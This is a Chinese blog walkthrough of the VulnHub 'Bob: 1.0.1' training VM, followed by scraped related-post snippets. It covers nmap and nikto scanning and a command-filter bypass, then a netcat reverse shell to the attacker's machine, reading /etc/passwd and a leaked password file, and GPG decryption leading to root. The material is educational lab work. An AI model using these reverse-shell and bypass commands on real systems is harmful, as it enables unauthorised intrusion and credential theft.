BOB: 1.0.1

最新推荐文章于 2024-10-16 16:58:36 发布
原创 最新推荐文章于 2024-10-16 16:58:36 发布 · 324 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文介绍了如何从ova文件导入虚拟机,通过NAT模式操作,利用nmap进行系统服务和漏洞扫描,包括端口探测、敏感目录查找以及发现并利用命令执行漏洞获取反弹shell。作者还展示了如何解密GPG加密文件和尝试登录以夺取旗子的过程。

靶机下载地址
直接从ova文件导入到VM虚拟机中,启动即可。网卡模式选择为NAT模式

思路

  1. 找ip
  2. 找到该ip的系统
  3. 系统部署了哪些服务
  4. 该系统有没有漏洞
  5. 尝试渗透

使用nmap收集信息

  1. nmap --help 查看参数
    在这里插入图片描述

     -sP  使用ping扫描
 -PO和Pn 无ping扫描
 -p 指定端口扫描 1-65535
 -p- 全端口扫描
 -v 打印全过程
 -O 探测目标主机版本
 -sV 显示服务的详细版本
 -A 全面扫描  1000个常用端口
 -oN 将扫描结果保存为txt文本
 -oX 将扫描结果保存为xml格式
 -T1,-T2 一直到-T5 扫描的速度

  2. 扫描全网段ping扫描
    在这里插入图片描述

  3. 全面扫描
    在这里插入图片描述

    也可以写入到文本里
    在这里插入图片描述

  4. 只扫描80端口
    在这里插入图片描述

  5. 扫描并生成ljh.txt文本
    在这里插入图片描述

    生成的文件
    在这里插入图片描述
    在这里插入图片描述

利用信息进行测试

  1. 根据信息得到的界面
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  2. 输入id,查看信息
    在这里插入图片描述

  3. 尝试ls,发现不行
    在这里插入图片描述

  4. 尝试其他命令进行尝试
    cat /etc/passwd
    失败
    在这里插入图片描述

  5. more /etc/passwd
    在这里插入图片描述
    所以应该是用的黑名单,所以more可以使用

敏感目录扫描

  1. 扫描敏感目录
    nikto -h IP
    在这里插入图片描述
    在这里插入图片描述
  2. 扫描到敏感目录
    dirb IP
    在这里插入图片描述

使用命令

  1. 查看命令的绝对路径
    在这里插入图片描述

  2. 绕过ls
    /usr/bin/ls
    在这里插入图片描述

    /bin/ls
    在这里插入图片描述

命令执行漏洞

  1. 工具 瑞士军刀
    nc -lvvp 8888(监听本机8888端口)
    在这里插入图片描述

    向kali 发送
    /bin/nc -e /bin/bash 10.9.21.68(kali的IP) 8888(Kali监听的端口)
    在这里插入图片描述

    已连接至目标主机
    在这里插入图片描述

    反弹shell
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  2. 唤出终端的命令行
    python -c “import pty;pty.spawn(‘/bin/bash’)”
    在这里插入图片描述
    在这里插入图片描述

    普通用户
    uid为1000+
    在这里插入图片描述

  3. 进入到bob目录
    查看是否有隐藏文件
    在这里插入图片描述

    查看权限
    ls -la
    在这里插入图片描述

  4. 发现旧密码相关的文件
    .old_passwordfile.html
    在这里插入图片描述

  5. 查看该文件内容
    cat .old_passwordfile.html
    发现账号:
    jc :Qwerty
    在这里插入图片描述

    使用putty进行远程连接
    在这里插入图片描述

  6. 输入JC 的账号密码
    在这里插入图片描述

    查看哪些文件夹有需要的文件
    发现GPG加密的文件
    在这里插入图片描述

    发现一个脚本文件
    在这里插入图片描述

    查看bob该脚本的权限
    ls -la
    在这里插入图片描述

  7. 运行该脚本
    sh 文件名 或者 ./ 文件名
    在这里插入图片描述

    将信息复制到收集到的信息中:
    并推测GPG加密秘钥可能是藏头字母:HARPOCRATES
    在这里插入图片描述

    解密
    gpg --batch – passphrase 秘钥 -d 加密的文件
    在这里插入图片描述

    得到bob的密码
    在这里插入图片描述

    切换到bob
    在这里插入图片描述

    查看flag,发现依旧没有权限
    在这里插入图片描述

  8. bob是网站管理员,所以root是不是和Bob用户一样呢?
    进行尝试
    登陆成功
    在这里插入图片描述

    夺旗
    在这里插入图片描述

vulnhub Bob: 1.0.1
箭雨镜屋
04-27 1742
渗透思路:nmap扫描----通过robots.txt得到/dev_shell目录----利用RCE得到反弹shell----找到.gpg文件密码并解密----sudo su提权
Bob: 1.0.1靶场渗透测试
sucker的博客
04-01 800
最后在/home/bob/Documents/Secret/Keep_Out/Not_Porn$ cd No_Lookie_In_Here/notes.sh下得到密钥。bob用户被允许使用sudo命令以root权限执行所有命令,直接sudo启动一个shell。7,既然知道了其他用户的账户密码,那么就可以ssh横向移动,用户jc密码Qwerty。所以密钥就为HARPOCRATES,然后回到那个gpg文件所在的目录,进行解密。5,在命令执行漏洞的页面getshell。3,对靶机进行端口服务探测。
vulnhub之Bob_1.0.1
qq_45300786的博客
11-24 327
http://www.mamicode.com/info-detail-3079690.html https://www.jianshu.com/p/30165f430175?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation
记:渗透测试-靶机训练Bob1.0.1
Anderlos
06-24 1254
前言 来优快云划水有几年了,一直处于学习的状态,直到今天才发第一篇文章,就以基础渗透作为开篇吧,技术不到位还望大佬们手下留情,话不多说直接进入分享 首先请出靶机 靶机界面 然后进入kali(其实是为了分享一波桌面) 首先确定一点问题就是,我们需要知道对方IP地址是多少(因为是在虚拟机环境内所以注定IP地址不会太多,所以我们既已知在一个网段内,只需要扫描出这个网段的所有主机即可) ip addr 先通过ip addr来确认一下我们...
BOB_1.0.1靶机详解
weixin_44681307的博客
07-29 528
然后我们在elliot的家目录发现一个txt文件,打开后发现里面有他的密码,也有James用户的密码。找到ip地址后对IP进行一个单独的扫描,发现ssh端口被改到25468了,等会儿登陆时候需要用到。但是关键词被过滤了,我们在ls中级加两个反斜线就发现可以使用ls命令,下面信息有反馈。然后make一下.c文件,这样就出来一个可执行文件,执行后就拿到了root权限。其实几个用户都是一样的,这个靶机并没有什么能利用的点,但是内核漏洞可以利用。wget过来,file一下发现是一个zip文件,我们解压一下。
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
【vulnhub】Bob1.0.1靶机
wbplife的博客
08-05 860
解密login.txt.gpg时提示权限不够,这个账户没权限那就ssh登录到其他账户试试,前面告诉我们jc和seb账户的密码,试试。继续拼接这些目录,/dev_shell.php,是一个命令执行功能的页面,测试后发现存在过滤,并不是所有命令都可以被执行的。这里通过管道符'|'列出当前目录下的文件,发现dev_shell.php.bak,即dev_shell.php的备份文件。查看里面的文件,login.txt.gpg这是一个经过gpg加密的文件,尝试解密。在这个用户里面解密login.txt.gpg文件。
Vulhub Bob: 1.0.1靶机详解
weixin_62457642的博客
10-16 690
靶机Bob: 1.0.1速刷
靶机【B2R】Bob:1.0.1
干铮的博客
09-26 1302
Bob:1.0.1 下载链接 https://download.vulnhub.com/bob/Bob_v1.0.1.ova 将靶机ova文件导入vmware中,更改网卡配置为桥接直接使用。 1.信息收集 根据已知靶机mac地址查询ip。 确定目标IP Nmap -sP 192.168.43.0/24 端口扫描 Nmap 192.168.43.169 -A -p- -oN namp.A C:\Users\ASUS>Nmap 192.168.43.169 -A -p-
【vulnhub靶场】Bob_v1.0.1靶机提权
qq_46421742的博客
07-29 423
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
BOB靶机渗透实战-----攻略(大神勿喷)
z2560088的博客
09-21 2828
准备工作 靶场 Bob: 1.0.1 ~ VulnHub 攻击工具kali虚拟机 直接双击打开即可添加到虚拟机。打开后网卡使用NAT模式。 没有给用户名和密码。(给了就没有攻击的必要了 hhh) 开始攻击 打开kali 使用nmap 扫描同网段下的ip和端口(因为靶机也用的NAT模式的网卡,所以按理说应该被分在了与kali虚拟机同网段的某一个ip地址) 我的kali ip 地址为192.168.160.129 nmap -sP 192.168.160.0/24 ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8860
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就1013日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Android ListView代码
最新发布
01-05
源码地址: https://pan.quark.cn/s/5c2ff67041b8 DEPRECATED ========== ListViewAnimations is deprecated in favor of new RecyclerView solutions. No new development will be taking place, but the existing versions will still function normally. Thanks for your support! ListViewAnimations =========== ListViewAnimations is an Open Source Android library that allows developers to easily create ListViews with animations. Feel free to use it all you want in your Android apps provided that you cite this project and include the license in your app. Features ---- ListViewAnimations provides the following features: Appearance animations for items in , , other ; * Built in animations include , , , , and . * Other animations can easily be added * StickyL...
基于SpringBoot与AWVS深度集成的企业级Web应用漏洞自动化扫描与智能管理平台_项目极简说明本项目是一个功能全面高度自动化的Web应用漏洞扫描与管理系统它深度整合了.zip
01-05
基于SpringBoot与AWVS深度集成的企业级Web应用漏洞自动化扫描与智能管理平台_项目极简说明本项目是一个功能全面高度自动化的Web应用漏洞扫描与管理系统它深度整合了.zip
利用呼吸质量指数和神经网络从光电容积图和心电图信号确定呼吸速率.zip
01-05
1.版本:matlab2014a/2019b/2024b 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
JSP程序设计入门教程-下载即用.zip
01-05
下载方式:https://pan.quark.cn/s/c9b9b647468b ### 初级JSP程序设计教程核心内容解析#### 一、JSP基础概述JSP(JavaServer Pages)是由Sun Microsystems公司创建的一种动态网页技术规范,主要应用于构建动态网站及Web应用。JSP技术使得开发者能够将动态数据与静态HTML文档整合,从而实现网页内容的灵活性和可变性。##### JSP的显著特性:1. **动态与静态内容的分离**:JSP技术支持将动态数据(例如数据库查询结果、实时时间等)嵌入到静态HTML文档中。这种设计方法增强了网页的适应性和可维护性。2. **易用性**:开发者可以利用常规的HTML编辑工具来编写静态部分,并通过简化的标签技术将动态内容集成到页面中。3. **跨平台兼容性**:基于Java平台的JSP具有优良的跨操作系统运行能力,能够在多种不同的系统环境中稳定工作。4. **强大的后台支持**:JSP能够通过JavaBean组件访问后端数据库及其他资源,以实现复杂的数据处理逻辑。5. **执行效率高**:JSP页面在初次被请求时会被转换为Servlet,随后的请求可以直接执行编译后的Servlet代码,从而提升了服务响应的效率。#### 二、JSP指令的运用JSP指令用于设定整个JSP页面的行为规范。这些指令通常放置在页面的顶部,向JSP容器提供处理页面的相关指导信息。##### 主要的指令类型:1. **Page指令**: - **语法结构**:`<%@ page attribute="value" %>` - **功能**:定义整个JSP页面的运行特性,如设定页面编码格式、错误处理机制等。 - **实例**: ...
基于AIFI特征交互与RT-DETR的实时目标检测技术:精度与速度协同优化的科研实践
01-05
内容概要:本文系统讲解了目标检测领域中RT-DETR与YOLOv8+AIFI的技术原理与实战复现方法,重点剖析了AIFI(尺度内特征交互)在提升模型精度中的关键作用。文章对比了YOLO系列与RT-DETR在架构设计上的差异,详细介绍了RT-DETR如何通过混合编码器、Query Selection等机制实现高精度实时检测,并指导读者在YOLOv8中集成AIFI模块以增强特征表达能力。同时提供了完整的代码实现路径、训练推理流程及性能评估方式,涵盖科研创新与工业落地的双重视角。; 使用场景及目标:①掌握RT-DETR脱离NMS实现实时高性能检测的技术路径;②理解AIFI在YOLOv8中提升小目标和密集目标检测能力的机制;③完成从环境搭建、模型训练到性能对比的全流程实验,支撑科研论文复现或工业项目优化; 阅读建议:建议结合提供的代码链接和配置文件边学边练,重点关注AIFI模块的实现逻辑与模型性能变化,同时尝试在此基础上进行结构改进或与其他注意力机制融合,深化对特征交互机制的理解与应用能力。
STM32DMA基于阿波罗-F767-UART-DMA-HAL库
01-05
STM32DMA基于阿波罗_F767_UART_DMA_HAL库,基于战舰V3_F103_UART_DMA_HAL库,基于战舰V3_F103_标准库_UART1_DMA接收
jdk-17.0.17-苹果系统ARM64位
01-05
jdk-17.0.17-苹果系统ARM64位
Python库bob.paper.biosig2016-1.0.1的介绍与安装
资源摘要信息:"Python库 | bob.paper.biosig2016-1.0.1.zip" 1. Python库介绍: - bob.paper.biosig2016-1.0.1.zip是指定的Python库的压缩包文件,其中bob很可能是一个特定的Python项目或库的名称,而paper.biosig...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值